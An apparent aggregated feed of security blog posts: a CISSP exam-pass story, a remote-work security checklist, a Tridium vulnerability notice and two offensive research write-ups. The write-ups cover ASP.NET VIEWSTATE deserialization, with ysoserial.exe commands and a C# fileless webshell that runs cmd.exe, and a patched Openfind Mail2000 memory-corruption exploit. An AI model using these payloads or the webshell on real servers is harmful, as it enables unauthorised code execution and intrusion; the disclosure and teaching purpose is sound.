  • One question of Encryption – Understand PPP L2TP PPTP L2F their succession which ones can use IPSEC, EAP
  • Bunch of Risk Management – Something just happened you need to do something. With these constraints. What’s best?
  • Asset and Data Classification/Security – Why do we classify anything?
  • Web Application Attack Recognition – Seeing and recognizing attacks described through a scenario or graphical depiction
  • US and Global Privacy Frameworks – GDPR – ECPA – OECD
  • Roles and Responsibilities – Who’s MOST important for security? CISO CEO ISM ISSO?
  • Communication & Network Security – What layer is LLC most likely apart of ?

I was nervous as hell clicking “Next” on the 100th question. I knew if exam ended I either did really well or really horribly also if it continued I knew I was exactly on the borderline and could still pass up to 150 but each question would have to be correct. If that was the case I wouldn’t have been pissed but I didn’t want that to occur to even have to be in that situation. The exam stops. I’m like “HOLY SHIT”. I get the TA’s attention, she signs me out and I go to the reception area to get the print-out. The receptionist was at the bathroom 😫 had to wait 5 minutes for her to come back. I was pacing so much the entire time I probably could have burned a hole in their damn carpet. The lady takes my ID and prints it out the result, peaks it, folds it and gives it to me looking me dead in the eye with a straight face. But I did notice it was one piece of paper and people said if you get one paper you pass – if you get more it’s because you failed and that’s the explanation of the domains you came up short in. I opened it and saw I had PASSED 😍 I threw the wildest air punch in history, luckily didn’t hurt myself, jump up and down a little (nobody else in reception area at this point, say “LET’S GO” as loud as I can (since the students are literally just around the corner) and notice the receptionist now smiling so said “Congratulations sorry I had to mess with you” 😂 Here’ it was guys that moment of passing that I visioned! Slaying the dragon. What a wonderful feeling 💘

Part-5: Thoughts?

If you’ve made it this far s/o to you! I’ll never write a TL/DR ever ✌🏽 The context matters … The journey matters.

My biggest advice would be to make the NIST RMF, SDLC and all the related documents your friend. These are going to help you substantially more than doing a zillion practice questions or reading the huge books. Also it sheds light on why so many smart technical folk fail this exam the first time. The day before the exam me @Beedo @Reepdeep MAJOR S/O TO THOSE GUYS – WHO ALSO PASSED THE SAME DAY studied from 1 pm to 10 pm going through all the processes from each domain, in our own words, understanding the steps to the process but understand how every single thing is tied back to risk management.
NOTE: We think the document we created could help everyone out there out as a definitive source for passing the exam. Obviously folks need to get back to the real life and people they’ve neglected since beginning the journey but it’s something we all feel strongly about and want to provide to the community hopefully soon 😎

Part-6: Things I Shared on Discord That I Think Should Be Included Here?

These are just excerpts but I figured they maybe valuable since you forget basically everything related to the exam afterwards.
Bear with me as the grammar may not be perfect it’s Discord so I’m not necessarily caring if I make a mistake to correct it. It’s conversational texting-like language. Most of it being typed from my phone.

In regards to the difference in seemingly all the practice material vs real exam:

“I see why all the practice material miss the mark. It’s because you truly need a intelligent person to be able to spend the time to make those questions and that person cost too much to write free questions on the internet for us .. Those aren’t ones you come up with based on a definition .. You understand someone thought deeply about this, so much so they knew the answer I’d immediately go for (and it’s wrong) is included as say answer A and make the right answer further down the list like D. You need to be very careful. Also saw 2 similar looking answers where you jumped immediately to the answer and didn’t thoroughly read it would have noticed the 2nd one further down was more right”

In regards to our day before exam study conference: 

it was impromptu as hell I was just going each of my Boson question explanation. It lasted lot longer than expected 😵🥴 went from like 1-10 yesterday on conference, went over each process understanding it and connecting the SDLC steps BCP steps back to RMF I’m sure they’ll agree understanding how everything relates back to RMF is the way to pass. Not technical … Not all the questions … Since they’re way to technical (use em to identify and reinforce you’re weak areas) we were already studied up at that point … Sybex/Boson/AIO/All the sources questions way to hard if we talking scope for exam. You’ll be placed in a bunch of situations where you’re somebody in security what’s BEST LEAST solution for this scenario.

On depth of question and context. Keep in mind we already knew the blocks lengths, key size ect:

For context it’s like understanding AES is a strong symmetric algorithm, DES is a weak one that shouldn’t be used. But not that 3DES EEE has a xyz length bit size and it goes through xy rounds – the latter is unnecessary .. If you know it so be it but that’s how I would scope everything. High level and how does is connect back to RMF .. I would read the RMF and SDLC NIST doc every night

On what I think is useful studying:

I’m saying you’ve read Sybex or over big book feel comfortable been browsing reddit know the sources the videos and all the questions we do here then can go through the 11th hr and understand everything then I would focus on the processes and how it relates to RM SDLC, IR, BCP knowing how those relate was my entire exam. I had a bunch of SDLC stuff lot of OWASP what vulnerability is this? Few question from domain 4 IPSec and understanding the protocol or layer.

Overall exam tips and thoughts:

“The exam was tough but I didn’t feel any point they were trying to trick or deceive me, every question was able to eliminate two answers of back. Some of the answers are similar then you figure out differences which was slightly hard in some cases some not. Felt familiar with all the terms answers. Question were clear. I didn’t even notice the experimental which I was on look out for. I think when studying we equate inch deep mile wide to difficult. In reality it’s just understanding how the domains work together. Remember every question CANNOT be a boulder. There were some gimmes… what is encryption… what is integrity for digital signatures type stuff. My best advice in hindsight with the above is DO NOT WASTE YOUR TIME doing all these questions, Boson, Ccure, Luke, Sybex. All of them! Only if you’re weak. If you can read 11th hr and notice everything nothings a shock stop. Understand how everything is bound by risk management. Btw I didn’t use the whole mgr mindset I just tried pick best 2 remaining options. There were plenty of answers that were “doing something” I threw those out automatically”

On how I would study differently:

“don’t worry and spend some time in the nist document’s 800-64 800-37 they all link to each other. So your thinking going through say SDLC is what am I doing in this step and how does it relate back to the RMF everything relates back to it. For example that in phase one of  the SDLC you have your requirements and stuff but you’re also initially understanding the systems that links back to step one in RMF which is Categorize, so think does this system store transmit or processes pii, what’s the risk. Or step two Development in SDLC, you know you starting design architecture development and testing, that relates to steps 2&3 (you also do risk assessment here) in RMF you’re identified the need for the system in initial requirements, so now in development we select the controls of the system and assess them that’s in SDLC phase two but you’re always grounded by RMF. See how that relates? I think that understanding this alone is how I passed”

Are questions from sybex syllabus or out of the box?
Wayy to technical as well as all the practice questions

Some people fail who had boson?
Boson shouldn’t be used to judge readiness just identity weak areas. You could get 20% on all bosons and pass since it’s mostly thinking not technical

How’s the difficulty level?
NOT DIFFICULT – DON’T BELIEVE THE HYPE – ALL OF US COULD PASS THIS EXAM

Do we need other source of study hindsight?
Read the NIST documents on all the processes and reclaim some of your time back

You are say every in this group can pass, can you tell your experience and main domain?
Mainly offsec and I do appsec at work for like 4 years. I’m an engineer so i have the fix it mindset by default. You don’t need be expert in anything. Just think of everything in risk mgmt is enough to pass

How long you have been preparing?
Studying since 1/28

What was difficult domain for you?
Domain 2 smh – Focus on 1,3,7 thought and definitely 8.. Obviously you need to be passing in all domains but since those weighted more it more advisable

Did you face any language mixing puzzle questions means they use different vocabulary 
There were NO gimmicks every question i knew exactly what they wanted.

Do you think feedback from people different industry get it more difficult than security?
It’s your understanding and mindset. Kelly and Larry tell you the mindset. I automatically threw any answer out that was “disconnect from network, make a firewall change”.

Did you feel it’s purely management?
No. Because being in mgmt although you’re not a doer you need to have a solid understanding of the underlying area no matter what it is.”

S/O to my Discord guys ALL OF YOU 💗

I’ve included a section below on the links that were most valuable to me. Good luck & NEVER give up or give in!

Part-7: Links

 

 

 

 

 

 

 

 

The post Slayed CISSP appeared first on Certification Chronicles.

玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門

10 March 2020 at 16:00

前言

這篇文章呼應我在研討會 DEVCORE CONFERENCE 2019 分享的主題,如何用小缺陷一步步擊破使用 ASP.NET 框架所撰寫的堅固的網站應用程式,其中之一的內容就是關於我們在此之前過往紅隊演練專案中,成功數次透過 VIEWSTATE 的反序列化攻擊並製造進入內網突破口的利用方式以及心得,也就是此篇文章的主題。

內文

最近微軟產品 Exchange Server 爆出一個嚴重漏洞 CVE-2020-0688,問題發生的原因是每台 Exchange Server 安裝完後在某個 Component 中都使用了同一把固定的 Machine Key,而相信大家都已經很熟悉取得 Machine Key 之後的利用套路了,可以竄改 ASP.NET Form 中的 VIEWSTATE 參數值以進行反序列化攻擊,從而達成 Remote Code Execution 控制整台主機伺服器。

更詳細的 CVE-2020-0688 漏洞細節可以參考 ZDI blog:

對於 VIEWSTATE exploit 分析在網路上已經有無數篇文章進行深入的探討,所以在此篇文章中將不再重複贅述,而今天主要想聊聊的是關於 VIEWSTATE exploit 在滲透測試中如何進行利用。

最基本、常見的方式是直接使用工具 ysoserial.net 的 ViewState Plugin 產生合法 MAC 與正確的加密內容,TypeConfuseDelegate gadget 經過一連串反射呼叫後預設會 invoke Process.Start 呼叫 cmd.exe,就可以觸發執行任意系統指令。

例如:

ysoserial.exe -p ViewState -g TypeConfuseDelegate
              -c "echo 123 > c:\pwn.txt"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

異常的 VIEWSTATE 通常會導致 aspx 頁面回應 500 Internal Server Error,所以我們也無法直接得知指令執行的結果,但既然有了任意執行,要用 PowerShell 回彈 Reverse Shell 或回傳指令結果到外部伺服器上並不是件難事。

But ..

在滲透測試的實戰中,事情往往沒這麼美好。現今企業資安意識都相對高,目標伺服器環境出現以下幾種限制都已是常態:

  • 封鎖所有主動對外連線
  • 禁止查詢外部 DNS
  • 網頁目錄無法寫入
  • 網頁目錄雖可寫,但存在 Website Defacement 防禦機制,會自動復原檔案

所以這時就可以充分利用另一個 ActivitySurrogateSelectorFromFile gadget 的能力,這個 gadget 利用呼叫 Assembly.Load 動態載入 .NET 組件達成 Remote Code Execution,換句話說,可以使我們擁有在與 aspx 頁面同一個 Runtime 環境中執行任意 .NET 語言程式碼的能力,而 .NET 預設都會存在一些指向共有資源的全域靜態變數可以使用,例如 System.Web.HttpContext.Current 就可以取得當下 HTTP 請求上下文的物件,也就像是我們能利用它來執行自己撰寫的 aspx 網頁的感覺,並且過程全是在記憶體中動態處理,於是就等同於建立了無檔案的 WebShell 後門!

我們只需要修改 -g 的參數成 ActivitySurrogateSelectorFromFile,而 -c 參數放的就不再是系統指令而是想執行的 ExploitClass.cs C# 程式碼檔案,後面用 ; 分號分隔加上所依賴需要引入的 dll。

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile
              -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

關於需要引入的 dll 可以在安裝了 .NET Framework 的 Windows 主機上找到,像我的環境是在這個路徑 C:\Windows\Microsoft.NET\Framework64\v4.0.30319 之中。

至於最關鍵的 ExploitClass.cs 該如何撰寫呢?將來會試著提交給 ysoserial.net,就可以在範例檔案裡找到它,或是可以先直接看這裡:

class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}

其中 Server.ClearError()Response.End() 都是必要且重要的一步,因為異常的 VIEWSTATE 必然會使得 aspx 頁面回應 500 或其他非預期的 Server Error,而呼叫第一個函式可以協助清除在當前 Runtime 環境下 stack 中所記錄的錯誤,而呼叫 End() 可以讓 ASP.NET 將當前上下文標記為請求已處理完成並直接將 Response 回應給客戶端,避免程式繼續進入其他 Error Handler 處理導致無法取得指令執行的輸出結果。

到這個步驟的話,理論上你只要送出請求時固定帶上這個惡意 VIEWSTATE,就可以像操作一般 WebShell 一樣:

不過有時也會出現這種情境:

不論怎麼改 Payload 再重送永遠都是得到 Server Error,於是就開始懷疑自己的人生 Q_Q

但也別急著灰心,可能只是你遇上的目標有很乖地定期更新了伺服器而已,因為微軟曾為了 ActivitySurrogateSelector 這個 gadget 加上了一些 patch,導致無法直接利用,好在有其他研究者馬上提供了解決方法使得這個 gadget 能再次被利用!

詳細細節可以閱讀這篇文章:Re-Animating ActivitySurrogateSelector By Nick Landers

總而言之,如果遇到上述情形,可以先嘗試用以下指令產生 VIEWSTATE 並發送一次給伺服器,順利的話就能使目標 Runtime 環境下的 DisableActivitySurrogateSelectorTypeCheck 變數值被設為 true,隨後再發送的 ActivitySurrogateSelector gadget 就不會再噴出 500 Server Error 了。

ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck
              -c "ignore"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

如果上述一切都很順利、成功執行系統指令並回傳了結果,基本上就足夠做大部分事情,而剩下的就是繼續盡情發揮你的想像力吧!

不過有時候即便到了此一步驟還是會有不明的錯誤、不明的原因導致 MAC 計算始終是錯誤的,因為 .NET 內部演算法以及需要的環境參數組合稍微複雜,使得工具沒辦法輕易涵蓋所有可能情況,而當遇到這種情形時,我目前選擇的解決方法都是發揮工人智慧,嘗試在本機建立環境、設定相同的 MachineKey、手工撰寫 aspx 檔案,產生包含 gadget 的 VIEWSTATE 再轉送到目標主機上。如果你有更多發現或不一樣的想法願意分享的話,也歡迎來和我交流聊聊天。

遠距工作的資安注意事項

3 March 2020 at 16:00

近期因新型冠狀病毒(COVID-19, 武漢肺炎)影響,不少企業開放同仁遠距工作 (Telework)、在家上班 (Work from home, WFH)。在疫情加速時,如果沒有準備周全就貿然全面開放,恐怕會遭遇尚未考慮到的資安議題。這篇文章提供一個簡單的指引,到底遠端在家上班有哪些注意事項?我們會從公司管理、使用者兩個面向來討論。

如果你只想看重點,請跳到最後一段 TL;DR。

攻擊手段

我們先來聊聊攻擊的手段。試想以下幾個攻擊情境,這些情境都曾被我們利用在紅隊演練的過程中,同樣也可能是企業的盲點。

  1. 情境一、VPN 撞庫攻擊:同仁 A 使用 VPN 連線企業內部網路,但 VPN 帳號使用的是自己慣用的帳號密碼,並且將這組帳號密碼重複使用在外其他非公司的服務上(如 Facebook、Adobe),而這組密碼在幾次外洩事件中早已外洩。攻擊團隊透過鎖定同仁 A,使用這組密碼登入企業內部。而很遺憾的 VPN 在企業內部網路並沒有嚴謹的隔離,因此在內部網路的直接找到內網員工 Portal,取得各種機敏資料。
  2. 情境二、VPN 漏洞:VPN 漏洞已經成為攻擊者的主要攻略目標,公司 B 使用的 VPN 伺服器含有漏洞,攻擊團隊透過漏洞取得 VPN 伺服器的控制權後,從管理後台配置客戶端 logon script,在同仁登入時執行惡意程式,獲得其電腦控制權,並取得公司機密文件。可以參考之前 Orange & Meh 的研究: https://www.youtube.com/watch?v=v7JUMb70ON4
  3. 情境三、中間人攻擊:同仁 C 在家透過 PPTP VPN 工作。不幸的是 C 小孩的電腦中安裝了含有惡意程式的盜版軟體。攻擊者透該電腦腦進行內網中間人攻擊 (MITM),劫持 C 的流量並破解取得 VPN 帳號密碼,成功進入企業內網。

以上只是幾個比較常見的情境,攻擊團隊的面向非常廣,而企業的防禦卻不容易做到滴水不漏。這也是為什麼我們要撰寫這篇文章,希望能幫助一些企業在遠距工作的時期也能達到基本的安全。

風險有什麼

風險指的是發生某個事件對於該主體可能造成的危害。透過前面介紹的攻擊手段要達成危害,對攻擊者來說並不困難,接著我們盤點出一些在企業的資安規範下,因應遠距工作可能大幅增加攻擊者達成機率的因子:

  • 環境複雜:公司無法管控家中、遠距的工作環境,這些環境也比較複雜危險。一些公司內部的管理監控機制都難以施展,也較難要求同仁在家中私人設備安裝監控機制。
  • 公司資料外洩或不當使用:若公司的資料遭到外洩或不當使用,將會有嚴重的損失。
  • 設備遺失、遭竊:不管是筆電或者是手機等裝置,遺失或者遭竊時,都會有資料外洩的風險。
  • 授權或存取控制不易實作:在短時間內提供大量員工的外部存取,勢必會在「可用性」和「安全性」間做出取捨。

若公司允許同仁使用私人的設備連上公司內部 VPN,這樣的議題就等同 BYOD (Bring Your Own Device),這些安全性的顧慮有不少文章可以參考。例如 NIST SP800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-46r2.pdf

公司面向

接下來我們來看看公司方面在遠距工作上面有哪些資安上面的作為。

工作流程及原則規劃

  • 工作流程調整:遠距工作時,每個流程該如何作對應的調整,例如如何在不同地點協同作業、彙整工作資料、確認工作成果及品質等。
  • 資料盤點:哪些資料放在雲端、伺服器、個人電腦,當遠距工作時哪些資料將無法被取用,或該將資料轉移到哪邊。
  • 會議流程:會議時視訊設備、軟體選擇及測試,並注意會議軟體通訊是否有加密。狀況如會議時間延長、同時發言、遠距品質影響等。
  • 事件處理團隊及流程:因遠距工作時發生的資安事件,該由誰負責處理、如何處理、盤點損失。
  • 僅知、最小權限原則:僅知原則 (Need-to-know Basis) 以及最小權限原則 (Principle of Least Privilege, PoLP),僅給予每個同仁最小限度需要的資料以及權限,避免額外的安全問題。

網路管理

  • VPN 帳號申請及盤點:哪些同仁需要使用 VPN,屬於哪些群組,每個群組的權限及連線範圍皆不同。
  • VPN 帳號權限範圍及內網分區:VPN 連線進來後,不應存取整個公司內網所有主機,因為 VPN 視同外部連線,風險等級應該更高,更應該做連線的分區管控。
  • 監控確認 VPN 流量及行為:透過內部網路的網路流量監控機制,確認 VPN 使用有無異常行為。
  • 只允許白名單設備取得 IP 位址:已申請的設備才能取得內網 IP 位址,避免可疑設備出現在內部網路。
  • 開啟帳號多因子認證:將雲端服務、VPN、內部網路服務開啟多因子認證。
  • 確認 VPN 伺服器是否為新版:在我們過去的研究發現 VPN 伺服器也會是攻擊的對象,因此密切注意是否有更新或者修補程式。

其中值得特別點出的是 VPN 的設定與開放。近期聽聞到不少公司的管理階層談論到,因應疫情原本不開放 VPN 權限的同仁現在全開放了。而問到 VPN 連線進公司內部網路之後的監控跟阻隔為何,卻較少有企業具備這樣的規劃。內部網路是企業的一大資安戰場,開放 VPN 的同時,必定要思考資安對應的措施。

使用者面向

公司準備好了,接下來就是使用者的安全性了。除了公司提供的 VPN 線路、架構、機制之外,使用者本身的資安意識、規範、安全性設定也一樣重要。

保密

  • 專機專用:用來存取公司網路或資料的電腦,應嚴格遵守此原則,禁止將該設備作為非公務用途。也應避免非公司人士使用或操作該裝置。

設備相關

  • 開啟裝置協尋、鎖定、清除功能:設備若可攜帶移動,設備的遺失對應方案就必須要考慮完整。例如如何尋找裝置、如何鎖定裝置、如何遠端清除已遺失的裝置避免資料外洩。現在主流作業系統多半都會提供這些機制。
  • 設備登入密碼:裝置登入時必須設定密碼,避免外人直接操作。
  • 設備全機加密:設備若遺失遭到分析,全機加密可以降低資料被破解遺失的風險。
  • (選擇性)MDM (Mobile Device Management):若公司有導入 MDM,可以協助以上的管理。

帳號密碼安全

  • 使用密碼管理工具並設定「強密碼」:可以考慮使用密碼管理工具並將密碼設為全隨機產生包含英文、數字、符號的密碼串。
  • 不同系統帳號使用不同密碼:這個在很多次演講中都有提到,建議每個系統皆使用不同密碼,防止撞庫攻擊。
  • 帳號開啟 2FA / MFA:若系統具備 2FA / MFA 機制,務必開啟,為帳號多一層保護。

網路使用

  • 避免使用公用 Wi-Fi 連接公司網路:公眾公用網路是相當危險的,恐被側錄或竄改。若必要時可使用手機熱點或透過 VPN 連接網際網路。
  • 禁止使用公用電腦登入公司系統:外面的公用電腦難確保沒有後門、Keylogger 之類的惡意程式,一定要禁止使用公用電腦來登入任何系統。
  • 確認連線裝置是否可取得內網 IP 位址:確認內網 IP 位址是否無誤,是否能夠正常存取公司內部系統。
  • 確認連線的對外 IP 位址:確認連線至網際網路的 IP 位址是否為預期,尤其是資安服務公司,對客戶連線的 IP 位址若有錯誤,可能釀成非常嚴重的損害。
  • (選擇性)安裝個人電腦防火牆:個人防火牆可以基本監控有無可疑程式想對外連線。
  • (選擇性)採用 E2EE 通訊工具:目前企業都會使用雲端通訊軟體,通訊軟體建議採用有 E2EE (End-to-End Encryption),如此可以確保公司內的機敏通訊內容只有內部人員才能解密,就連平台商也無法存取。
  • (選擇性)工作時關閉不必要的連線(如藍牙等):部分資安專家表示,建議在工作時將電腦的非必要連線管道全數關閉,如藍牙等,在外部公眾環境或許有心人士可以透過藍牙 exploit 攻擊個人裝置。

資料管理

  • 只留存在公司設備:公司的機敏資料、文件等,必須只留存在公司設備中,避免資料外洩以及管理問題。
  • 稽核記錄:記錄機敏資料的存放、修改、擁有人等資訊。
  • 重要文件加密:重要的文件必須加密,且密碼不得存放在同一目錄。
  • 信件附件加密,密碼透過另一管道傳遞:郵件的附件除了要加密之外,密碼必須使用另一管道傳遞。例如當面告知、事前約定、透過 E2EE 加密通道、或者是透過非網路方式給予。
  • 備份資料:機敏資料一定要備份,可以遵循「3-2-1 Backup Strategy」:三份備份、兩種媒體、一個放置異地。

實體安全

  • 離開電腦時立刻鎖定螢幕:離開電腦的習慣是馬上進入螢幕保護程式並且鎖定,不少朋友是放著讓他等他自己進入鎖定,但這個時間差有心人士已經可以完成攻擊。
  • 禁止插入來路不明的隨身碟或裝置:社交工程的手法之一,就是讓同仁插入惡意的 USB,甚至有可能摧毀電腦(Bad USB, USB Killer)。
  • 注意外人偷窺螢幕或碰觸設備:若常在外工作處於公共空間,可以考慮採購螢幕防窺片。
  • 不放置電腦設備在車上:雖然台灣治安不錯,但也是不少筆電在車上遭竊,重要資產記得隨身攜帶,或者放置在隱密處。
  • 將工作區域關門或鎖上:若在自己的工作區域,為了爭取更多時間應變突發狀況,建議將工作區域的門關閉或者上鎖。

TL;DR 防疫同時也別忽視資訊安全!

網路的攻防就是一場戰爭,如果不從攻擊者的面向去思考防禦策略,不但無法有效的減緩攻擊,更可能在全世界疫情逐漸失控的當下,讓惡意人士透過這樣的時機攻擊遠距工作的企業。期望我們的經驗分享能夠給企業一些基本的指引,也希望天災人禍能夠儘速消彌。台灣加油!

  • 開放 VPN 服務前,注意帳號管理以及內網切割隔離,避免透過 VPN 存取內網任意主機。
  • 雲端、網路服務務必使用獨一無二長密碼,並開啟 MFA / 2FA 多因子認證。
  • 使用雲端服務時務必盤點存取權限,避免文件連結可被任意人存取。
  • 注意設備遺失、竊取、社交工程等實體安全議題。
  • 網路是危險的,請使用可信賴的網路,並在通訊、傳輸時採用加密方式進行。

Tridium Niagara Vulnerabilities

By: JW
5 January 2020 at 20:00
**If you’ve been contacted by me, it is because your device is on the internet and may be vulnerable to the vulnerabilities identified below. Please read through this and contact me if you have questions. Thanks** What is Tridium Niagara? Tridium is the developer of Niagara Framework. The Niagara Framework is a universal software infrastructure...

飛鴿傳書 - 紅隊演練中的數位擄鴿

22 December 2019 at 16:00

郵件系統作為大部分企業主要的資訊交換方式,在戰略上佔有了舉足輕重的地位。掌控了郵件伺服器不僅可以竊聽郵件的內容,甚至許多重要文件都可以在郵件系統中找到,使得駭客能夠更進一步的滲透。本篇文章將介紹研究組在 Openfind Mail2000 這套軟體上發現的記憶體漏洞,以及利用這個漏洞的攻擊手法。 此漏洞為 2018 年時發現,當時已通報 Openfind 並且迅速被修補,同時也已協助相關用戶進行更新。

Openfind Mail2000

Mail2000 是一套由台灣廠商 Openfind 所開發,簡單易用的電子郵件系統,被廣泛使用於台灣的公家機關、教育機構,如台北市教育局、中科院,以及臺灣科技大學都有使用 Mail2000 作為主要的郵件伺服器。常見的入口介面如下:

這次的漏洞,便是從這個 Web 介面,利用 Binary 的手法,攻陷整台伺服器!

伺服器架構

Mail2000 提供了 Web 介面供管理員以及使用者操作,也就是所謂的 Webmail,而此處 Openfind 使用了 CGI (Common Gateway Interface) 的技術來實作。大多數 Web 伺服器實現 CGI 的方式如圖: 首先由 httpd 接受客戶端的請求後,根據對應的 CGI 路徑,執行相對應的 CGI 檔案。而大多數的開發者會根據需求,將常見的共用 function 撰寫成 library,供 CGI 呼叫。 往底層來看,其實可以發現,雖然稱為 Web 伺服器,仍有許多元件是建構於 binary 之上的!例如 httpd,為了效能,多是由 C/C++ 所撰寫,而其它像是 library、擴充的 module、各頁面的 CGI 也常是如此。因此,binary 相關的漏洞,便是我們這次的攻擊目標!

漏洞

這個漏洞位於 Openfind 實作的 library libm2kc 中,此函式庫包含了各種 CGI 通用函式,如參數解析及檔案處理等等,而這個漏洞就發生在參數解析的部分。由於參數處理是很底層且基本的功能,因此影響的範圍非常的大,就連 Openfind 的其它產品也同樣受影響! 這個漏洞的觸發條件如下:

  • 攻擊者使用 multipart 形式發送 HTTP POST 請求
  • POST 傳送的資料內容超過 200 項

multipart 是 HTTP 協定中,用來處理多項檔案傳輸時的一種格式,舉例如下:

Content-Type: multipart/form-data; boundary=AaB03x 
 


--AaB03x

Content-Disposition: form-data; name="files"; filename="file1.txt"

Content-Type: text/plain



... contents of file1.txt ...

--AaB03x--

而在 libm2kc 中,使用了陣列來儲存參數:

g_stCGIEnv.param_cnt = 0;
while(p=next_param())
{
  g_stCGIEnv.param[param_cnt] = p;
  g_stCGIEnv.param_cnt++;
}

這個陣列為全域變數 g_stCGIEnv 中的 param,在存入 param 陣列時,並沒有檢查是否已超過宣告的陣列大小,就造成了越界寫入。

需要注意的是,param 陣列所儲存的結構為指向字串位置的指標,而非字串本身

struct param
{
    char *key;
    char *value;
    int flag;
};

因此當觸發越界寫入時,寫入記憶體的值也是一個個指向字串的指標,而被指向的字串內容則是造成溢出的參數。

漏洞利用

要利用越界寫入的漏洞,就要先了解利用這個溢出可以做到什麼,發生溢出的全域變數結構如下:

00000000 CGIEnv          struc ; (sizeof=0x6990, mappedto_95)
00000000 buf             dd ?                    ; offset
00000004 length          dd ?
00000008 field_8         dd 6144 dup(?)          ; offset
00006008 param_arr       param 200 dup(?)
00006968 file_vec        dd ?                    ; offset
0000696C vec_len         dd ?
00006970 vec_cur_len     dd ?
00006974 arg_cnt         dd ?
00006978 field_6978      dd ?
0000697C errcode         dd ?
00006980 method          dd ?
00006984 is_multipart    dd ?
00006988 read_func       dd ?
0000698C field_698C      dd ?
00006990 CGIEnv          ends

溢出的陣列為其中的param_arr,因此在其之後的變數皆可能被覆寫。包括post_filesvec_lenvec_cur_lenarg_cnt … 等等。其中最吸引我注意的是file_vec這個變數,這是一個用來管理 POST 上傳檔案的 vector,大部分的 vector 結構像是這樣: 使用 size 記錄陣列的總長度,end 記錄目前用到哪裡,這樣就可以在容量不夠的時候進行擴充。我們若利用漏洞,使溢出的指標覆蓋 vector 的指標,就有可能有效的利用!藉由覆蓋這個 vector 指標,我們可以達到偽造一個 POST file,及其中所有相關變數的效果,而這個 POST file 結構裡面就包含了各種常見的檔案相關變數,像是路徑、檔名,和 Linux 中用來管理檔案的 FILE 結構,而 FILE 結構便是這次的攻擊的關鍵!

FILE Structure Exploit

這次的攻擊使用了 FILE structure exploit 的手法,是近幾年較新發現的攻擊手法,由 angelboy 在 HITCON CMT 公開[1]

FILE 結構是 Linux 中用來做檔案處理的結構,像是 STDINSTDOUTSTDERR,或者是呼叫 fopen 後回傳的結構都是 FILE。而這個結構之所以能成為漏洞利用的突破口主要原因就是它所包含的 vtable 指標:

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

vtable 當中記錄了各種 function pointer,對應各種檔案處理相關的功能:

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    /* ... */
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    /* ... */
};

因此如果我們可以篡改、偽造這個 vtable 的話,就可以在程式做檔案處理的時候,劫持程式流程!我們可以以此訂出以下的攻擊步驟:

  1. 建立連線,呼叫 CGI
  2. 使用大量參數,覆寫 vector 指標
  3. 偽造 POST file 當中的 FILE*,指向一塊偽造的 FILE 結構
  4. 在 CGI 流程中呼叫 FILE 相關的操作
    • fread, fwrite, fclose, …
  5. 劫持程式流程

我們現在已經知道終點是呼叫一個 FILE 操作,那麼就可以開始往回找哪個 function 是 CGI 常用的 FILE 操作,又有哪一些 CGI 可以作為入口點,才能串出我們的攻擊鏈!我們首先對使用到 POST file 的相關函式做研究,並選定了目標 MCGI_VarClear()MCGI_VarClear() 在許多用到 FILE 的 CGI 中有被呼叫,它用於在程式結束前將 g_stCGIEnv 清空,包括將動態配置的記憶體 free() 掉,以及將所有 FILE 關閉,也就是呼叫 fclose(),也意味著是可以通過 vtable 被劫持的!我們可以使用這個越界寫入漏洞蓋掉 file_vec,而指向的內容就是 HTTP request 的參數,便可以偽造為 POST files!像是下面這個結構:

我們的最終目標就是將 FILE* 指向偽造的結構,藉由偽造的 vtable 劫持程式流程!這時候便出現了一個問題,我們需要將 FILE* 這個指標指向一個內容可控的位置,但是其實我們並不知道該指到哪裡去,會有這個問題是起因於 Linux 上的一個防禦機制 - ASLR。

Address Space Layout Randomization (ASLR)

ASLR 使得每次程式在執行並載入記憶體時,會隨機載入至不同的記憶體位置,我們可以嘗試使用 cat /proc/self/maps 觀察每一次執行時的記憶體位置是否相同: ASLR 在大部分的環境中都是預設開啟的,因此在撰寫 exploit 時,常遇到可以偽造指標,卻不知道該指到哪裡的窘境。 而這個機制在 CGI 的架構下會造成更大的阻礙,一般的伺服器的攻擊流程可能是這樣: 可以在一個連線當中 leak address 並用來做進一步的攻擊,但在 CGI 架構中卻是這樣: 在這個情況下,leak 得到的 address 是無法在後續攻擊中使用的!因為 CGI 執行完就結束了,下一個 request 又是全新的 CGI! 為了應對這個問題,我們最後寫了兩個 exploit,攻擊的手法根據 CGI binary 而有不同。

Post-Auth RCE - /cgi-bin/msg_read

第一個 exploit 的入口點是一個需要登入的頁面,這一隻程式較大、功能也較多。在這一個 exploit 中,我們使用了 heap spray 的手法來克服 ASLR,也就是在 heap 中填入大量重複的物件,如此一來我們就有很高的機率可以到它的位置。 而 spray 的內容就是大量偽造好的 FILE 結構,包含偽造的 vtable。從這隻 binary 中,我們找到了一個十分實用的 gadget,也就是小程式片段:

xchg eax, esp; ret

